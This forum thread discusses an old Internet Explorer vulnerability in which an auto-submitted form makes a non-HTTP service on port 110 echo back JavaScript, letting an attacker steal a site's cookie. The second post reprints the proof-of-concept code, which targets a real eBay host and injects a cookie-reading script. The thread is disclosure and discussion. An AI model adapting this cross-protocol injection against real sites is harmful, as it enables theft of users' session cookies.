New IE vulnerability !!!
Results 1 to 2 of 2

Thread: New IE vulnerability !!!

  1. #1

    Cool New IE vulnerability !!!

    A malicious user can create a form which is submitted by the victim (automatically using Active Scripting or manually using Social Engineering). This form can cause a non-HTTP service to echo back JavaScript commands which in turn allow the malicious user to steal the cookie for that domain. There are more uses for this attack, other than just stealing cookies.

    Read full article at www.xatrix.org

    Exploit available.

  2. #2
    Banned
    Join Date
    Oct 2001
    Posts
    1,463
    Do you work for Xatrix? Oh well... Another good example of Microsoft.... If your using Windows switch to Linux... If you dont want to.... At least use Opera.....
    BTW I like the code they used... Its amazing no one figured this out sooner...
    Code:
    <script>
    window.open("http://www.ebay.com","w");
    setTimeout("form1.submit()",300);
    </script>
    <form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
      <textarea name="eostest">
    user <script>alert(document.cookie)</script>
    quit
      </textarea>
      <input type="submit" value="Submit">
    </form>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides